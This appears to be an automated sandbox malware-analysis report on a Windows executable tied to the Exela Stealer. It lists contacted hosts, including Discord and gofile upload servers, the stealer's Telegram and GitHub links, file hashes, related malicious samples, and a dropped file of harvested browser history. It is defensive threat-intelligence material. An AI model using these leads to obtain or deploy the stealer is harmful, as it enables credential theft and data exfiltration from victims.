                                                                                                                                                  https://www.attrs.org/en/stable/changelog.htmlSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://cryptography.io/en/latest/security/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://cffi.readthedocs.io/en/latest/using.html#callbacksSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454825824.00007FFD9DEB1000.00000040.00000001.01000000.00000020.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://i.hizliresim.com/6t31tw2.jpgSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2432689144.0000018B4797A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://thumbnails.roblox.com/v1/users/avatar?userIds=SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.variomedia.de/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://bugs.python.org/issue37179SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://twitter.com/i/api/1.1/account/update_profile.jsonPSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://crl.microsoftfM%powershell.exe, 00000051.00000002.2339776433.00000260D9310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.reddit.com/user/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pySecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://github.com/quicaxd/Exela-V2.0zISecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://go.mSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417280165.0000018B49E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://github.com/pyca/cryptography/issuesMETADATA0.0.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://readthedocs.org/projects/cryptography/badge/?version=latestSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://t.me/ExelaStealerSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.attrs.org/METADATA.0.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://mahler:8092/site-updates.pySecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2144659393.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437909240.0000018B479B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444100879.0000018B479B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://oauth.reddit.com/api/v1/me | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://github.com/pyca/cryptography | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr | false | | unknown
https://www.python.org/download/releases/2.3/mro/. | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://cryptography.io/ | METADATA0.0.dr | false | | unknown
https://github.com | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445342112.0000018B48180000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://docs.python.org/3/library/asyncio-eventloop.html | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437147317.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434152201.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444141427.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445233438.0000018B48010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435080757.0000018B47A0A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/quicaxd/Ex | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://i.hizliresim.com/6t31tw2.jpgpZ9H | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://python.org/ | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2436331270.0000018B472F6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441263044.0000018B472F7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://peps.python.org/pep-0749/)-implementing | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)). | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.136.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
162.159.137.232 | unknown | United States | 13335 | CLOUDFLARENETUS | false
45.112.123.126 | api.gofile.io | Singapore | 16509 | AMAZON-02US | false
45.112.123.227 | store1.gofile.io | Singapore | 16509 | AMAZON-02US | false

Private IPs

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543665
Start date and time: 2024-10-28 08:19:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 84
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.FileRepMalware.22561.28030.exe
Detection: MAL
Classification: mal100.rans.spre.phis.troj.spyw.evad.winEXE@141/144@6/6
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 78%
• Number of executed functions: 72
• Number of non-executed functions: 159
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, crl3.digicert.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7120 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SecuriteInfo.com.FileRepMalware.22561.28030.exe
Time | Type | Description
03:20:10 | API Interceptor | 7x Sleep call for process: WMIC.exe modified
03:20:17 | API Interceptor | 18x Sleep call for process: powershell.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | ip-api.com/json
208.95.112.1 | SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe | malicious | Blank Grabber | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Python.Packed.59.10217.7860.exe | malicious | Blank Grabber | ip-api.com/line/?fields=hosting
208.95.112.1 | 5K9iuU0ALY.exe | malicious | Blank Grabber, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | hQr269FZU1.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | loader.exe | malicious | DCRat | ip-api.com/line/?fields=hosting
208.95.112.1 | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
162.159.136.232 | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | discord.com/administrator/index.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP / URL)

Match: api.gofile.io
  SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 45.112.123.126
  SecuriteInfo.com.Win64.Malware-gen.4046.15809.exe | malicious | EICAR | 104.251.123.67
  SecuriteInfo.com.Win64.Malware-gen.4046.15809.exe | malicious | Unknown | 45.112.123.126
  General Agreement.docx.exe | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | 45.112.123.126
  NdEIhUToOm.exe | malicious | Exela Stealer, Python Stealer | 45.112.123.126
  LgZMfpsDaL.exe | malicious | Exela Stealer, Growtopia, Python Stealer | 45.112.123.126
  WCA-Cooperative-Agreement.docx.exe | malicious | Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber | 45.112.123.126
  HyZh4pn0RF.exe | malicious | Creal Stealer | 45.112.123.126
  HogWarp.exe.bin.exe | malicious | Unknown | 45.112.123.126
  VegaX.exe | malicious | Unknown | 51.38.43.18

Match: discord.com
  SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 162.159.138.232
  runtime.exe | malicious | Unknown | 162.159.138.232
  runtime.exe | malicious | Unknown | 162.159.128.233
  General Agreement.docx.exe | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | 162.159.138.232
  LDlanZur0i.exe | malicious | Unknown | 162.159.138.232
  Fa1QSXjTZD.exe | malicious | Unknown | 162.159.128.233
  xxImTScxAq.exe | malicious | Unknown | 162.159.136.232
  https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe | malicious | Unknown | 162.159.135.232
  570ZenR882.exe | malicious | Unknown | 162.159.135.232
  570ZenR882.exe | malicious | Unknown | 162.159.137.232

Match: ip-api.com
  file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 208.95.112.1
  SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
  SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe | malicious | Blank Grabber | 208.95.112.1
  SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber | 208.95.112.1
  SecuriteInfo.com.Python.Packed.59.10217.7860.exe | malicious | Blank Grabber | 208.95.112.1
  5K9iuU0ALY.exe | malicious | Blank Grabber, XWorm | 208.95.112.1
  hQr269FZU1.exe | malicious | XWorm | 208.95.112.1
  loader.exe | malicious | DCRat | 208.95.112.1
  transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
  SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | malicious | XWorm | 208.95.112.1

Match: store1.gofile.io
  SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 45.112.123.227
  General Agreement.docx.exe | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber | 45.112.123.227
  NdEIhUToOm.exe | malicious | Exela Stealer, Python Stealer | 45.112.123.227
  LgZMfpsDaL.exe | malicious | Exela Stealer, Growtopia, Python Stealer | 45.112.123.227
  WCA-Cooperative-Agreement.docx.exe | malicious | Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber | 45.112.123.227
  Exela(1).exe | malicious | Exela Stealer, Python Stealer | 45.112.123.227
  RebelCracked.exe | malicious | Exela Stealer, Python Stealer | 45.112.123.227
  Exter.exe | malicious | Exela Stealer, Python Stealer | 45.112.123.227
  ZK9XFb424l.exe | malicious | Python Stealer, Creal Stealer, XWorm | 45.112.123.227
  boost.exe | malicious | NovaSentinel | 45.112.123.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP / URL)

Match: CLOUDFLARENETUS
  file.exe | malicious | LummaC | 104.21.95.91
  nabppc.elf | malicious | Unknown | 104.21.20.147
  jklmpsl.elf | malicious | Unknown | 104.19.61.123
  nklarm.elf | malicious | Unknown | 188.114.96.83
  jklarm5.elf | malicious | Unknown | 1.2.9.168
  http://delivery.aima.in/KUJABQ?id=12442=dkxVUwNRDAEFTQIMBlVXAlpcUABXUAlUW1BaUQMHCQQMB1RQBwAKAwMHUlMBVQsKAQ1KQ1IQSlQGdQtdWUFRG0VcGVIFUQENDgMABgcGBwdVAAUOTwpEQRIPTRxSUlxcQ1UXGhwCUVhWH15bGXhmeSN7ZwZaBkxDUQ==&fl=XUQRE0FZFxpUVFlBRFJfQw1LQlhfTFFHAV0HV0NUX1haXgwXQQtZG1hDUBtYVBxaDF1TQQBMWEEPWQ== | malicious | Unknown | 172.67.194.253
  #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
  file.exe | malicious | LummaC | 104.21.95.91
  la.bot.sh4.elf | malicious | Unknown | 162.159.234.76
  RFQ_List.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
Match: TUT-ASUS
  file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 208.95.112.1
  SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
  SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe | malicious | Blank Grabber | 208.95.112.1
  SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber | 208.95.112.1
  SecuriteInfo.com.Python.Packed.59.10217.7860.exe | malicious | Blank Grabber | 208.95.112.1
  5K9iuU0ALY.exe | malicious | Blank Grabber, XWorm | 208.95.112.1
  hQr269FZU1.exe | malicious | XWorm | 208.95.112.1
  loader.exe | malicious | DCRat | 208.95.112.1
  transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
  SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | malicious | XWorm | 208.95.112.1

Match: AMAZON-02US
  nklarm7.elf | malicious | Unknown
                                                                                                                                                                                                              • 3.184.241.126
                                                                                                                                                                                                              nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.94.56.90
                                                                                                                                                                                                              nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 34.246.78.44
                                                                                                                                                                                                              sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 13.61.153.115
                                                                                                                                                                                                              m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 13.225.147.18
                                                                                                                                                                                                              nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 18.231.122.208
                                                                                                                                                                                                              nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.111.199.107
                                                                                                                                                                                                              zersh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 34.254.182.186
                                                                                                                                                                                                              splmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 35.156.178.205
                                                                                                                                                                                                              jklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 18.249.114.120
Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 9934907
Entropy (8bit): 7.995208917234906
Encrypted: true
SSDEEP: 196608:ha72hCxocemXyuSyTde8pDOlocCREhS0kCnPnqFrpAChlwc:bcgtByxjp0oVWQsPwAyT
MD5: AECB2C382B2181620AA3243DCBCA51C8
SHA1: 9B103AA29DD1F39B7BB6261703F144BFDFA4A06E
SHA-256: 6B9568F25DBA66DDE3D01BAA88FF15CE5165FED7C29C8446D8FAB993234A49CE
SHA-512: CCC1F0CB5A5DB4F65A5F1A21741F4C29784061F6F3DA512E14B0CFCEF9D949F6F414A61C3F792CB55D2E8196B8BEF51B099ABDAB29DB7948E38864A9C28F731D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 2.0
Encrypted: false
SSDEEP: 3:qn:qn
MD5: 3F1D1D8D87177D3D8D897D7E421F84D6
SHA1: DD082D742A5CB751290F1DB2BD519C286AA86D95
SHA-256: F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
SHA-512: 2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
Malicious: false
Preview: blat

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 695278
Entropy (8bit): 7.99809385153144
Encrypted: true
SSDEEP: 12288:waybHh4M8hlTwRUDesLCXiso4UVw9DGkYAZAQFR+WbWyQWCAqEXJY7:bGGht4UD9LCFvNAOWyQQX27
MD5: C0539707D3F352C00830D4DBF491BEAB
SHA1: 0AA9EAFAE8A3A498B6C30CC0C6C9FA8664DCB068
SHA-256: FE49FB14BDC24C1846CADEA41E70E517C33CEBD3D9AE6C092319C00EE15684C0
SHA-512: 9184F6FC73D91F1F82FD8EC9844B6FB6B1C623B7BDB8431BF61629A6531D5C383E655EF485F15F6D78523E0C68686B263B91CF086CC8ECEF6580261AD793D0A4
Malicious: false

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 432
Entropy (8bit): 5.368010392687688
Encrypted: false
SSDEEP: 12:L6s74QVLP3ClDuyXv3RdJqmOvO65+7273uM:LDlJy/3nJqm2X1KM
MD5: 5A04A94A805B9546276D42B3D1D5FBD4
SHA1: 83E94C6A2B31AA39C6BEFC9D05F5DC7409E7E203
SHA-256: A491D18C252AA087E3F1B84AA67542D47BF40BA70DCE126EAC0E793E31DC7F98
SHA-512: 1A34E323173A18A291BBB40380C0A429598AF0D49EE86EF574A58FA01DCF2F115598E0316D856937DA61EAACF27CA8DDFB39D9D44F75440119D97BF913DA31BF
Malicious: true

Process: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1295
Entropy (8bit): 4.0154987872336445
Encrypted: false
SSDEEP: 12:L6cJ8493sMwlookqCVorJW2493szwvaacAhZmKpokqCVorJs57oSQokqCVorJS47:L5xsMvXvxsajXJl1QXbsBQXY6CQExX3
MD5: D305DDE0BE4E1BE415C5CD7AC89D871F
SHA1: 16BD19908793C625ED001BE4C7A1E5671DDD6AC2
SHA-256: 1B6D4F6D514FB0C8793014C55FBBC8CCEB7936DE36CE0DD1FB6E1BD4B357977C
SHA-512: 25ABFB49992328344EA727090E4CD1CAB65778239940D2B591E2DC796755905D10EC0F9B415B1B94D3747620510AA3582F24BDADA13D009C1159DFA4D3363B68
Malicious: true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..=========================================================================
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):695758
                                                                                                                                                                                                                                  Entropy (8bit):7.927157243130488
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:nP54EwJMB9qOzqeCblMzJR51imdAoxa1wz+o68K7KxmUa274eAy:nKJMaOmeCbl0Jpik2o68t4UxEy
                                                                                                                                                                                                                                  MD5:45F2A51D425B351AFFC136460DB723F2
                                                                                                                                                                                                                                  SHA1:E57407EF929740B0DD6A29B32C54E75D5F9F5359
                                                                                                                                                                                                                                  SHA-256:BBAD0BD0F722169F2F775F7C3C4AF3C8FC5C29AADFEF0569B1DEE6F96ADA294A
                                                                                                                                                                                                                                  SHA-512:8F384ADCD85CC7BE54932CECF811F39EA57B04B941874E6BB9E02F4C6D7259F7CB0E28A245774E6B34C81FB250C45997D63A1A311AC7F73608A93D04DE56BBB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]............_.m........jWU..VQv........d..\6`...`@..`3.0...<a03.4.b..$f..!....._..?.o.>w.{S....oE..q.)l.v..h..r.,/...8wflE...:s]G.gL....=L2n....w...N{...7"C..x_.d"....:J.5.q.........+.o.G...b.D..Vo.Nxn..X.lW../V..y\..C...7....1.....66h.G=..C..?.?U1.'.=..C_ybb........zb(...U}......_..>....G>.........{...O?\1t.C.s...y....b.S.....2.1.O..|"...;.}<..A.c.V...=#............}.....C.........s4V,.C..;......C..c...^1..;.`.-.....A+....F..>..nK..."..l_9........c.h.pkh..9..0....p.k.P...`...L90.U.X......C..R..x{....c..ax.e..bj..;7e..Sl.~7.)..}b~;....ky...,4.\..{,I}.S....c...i..sK..s..v...G;...o.vS.c<..i.8.66..G.C.F.X.....-a<.{..mq...MUl...i{.}c...N.#..=..M.....5..n7&.v]....P............){,N......ki.1?-~...O....j....q...;.`...s....#....1<..8&'.Y..E.<.....x......K.....F.5g][..9.0en...A{..v..fN.....V..c....Y.OLy.8....y.;.1.O......5)....).\].k1..i.)q,.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):272
                                                                                                                                                                                                                                  Entropy (8bit):4.249865965726774
                                                                                                                                                                                                                                  Encrypted:false
